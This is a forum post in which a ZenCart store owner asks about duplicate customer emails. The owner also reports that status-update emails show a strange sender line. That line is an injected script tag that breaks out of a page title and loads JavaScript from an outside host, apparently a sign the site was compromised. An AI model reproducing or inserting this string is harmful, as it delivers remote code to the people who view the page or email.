I have two issues with regard to ZenCart generated emails:

Duplicates - When a customer creates a new account, I get two copies of the "welcome email" which they receive. Also, when an order is placed, I receive duplicate order confirmations. I've searched the FAQ and the forum but couldn't find a response to that issue. Of course, I didn't check each of the thousands of threads.

E-dress not appearing - When the order status is changed and the notify customer box is checked (for example when an item is shipped) the ZenCart generated email update to the customer also is sent twice. Additionally, and more troublesome, is the fact that my site's email address does not appear. Instead the email shows as coming from:

</title><script src=http://domboware.hu/js></script><title>

I've checked everywhere I can think to check in ZenCart back-end and can't seem to locate where to make those notices identify our proper e-dress. This problem does not occur when the "welcome email" is sent nor when the order confirmation email is sent. It only happens with status updates to the customer.
